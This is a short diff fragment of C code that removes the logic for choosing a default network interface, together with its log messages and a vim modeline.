-    /* select a default device if not specified */
-    if (!ifaces)  {
-        if (strlen(interfaces[0].ifname)) {
-            write_log(2,"Warning: interface %s selected as the default one\n", &interfaces[0].ifname);
-            if ((tmp = interfaces_add(interfaces[0].ifname)) == -1)
-            {
-               write_log(2,"Unable to use interface %s!! (Maybe nonexistent?)\n\n", interfaces[0].ifname);
-               return -1;
-            }
-            else
-                node->used_ints[tmp] = 1;
-                ifaces++;
-        } else {
-            write_log(2,"Hmm... you don't have any valid interface. Go and get a life!\n");
-            return -1;
-        }
-    }
-
    return 0;
-
 }
-
-/* vim:set tabstop=4:set expandtab:set shiftwidth=4:set textwidth=78: */
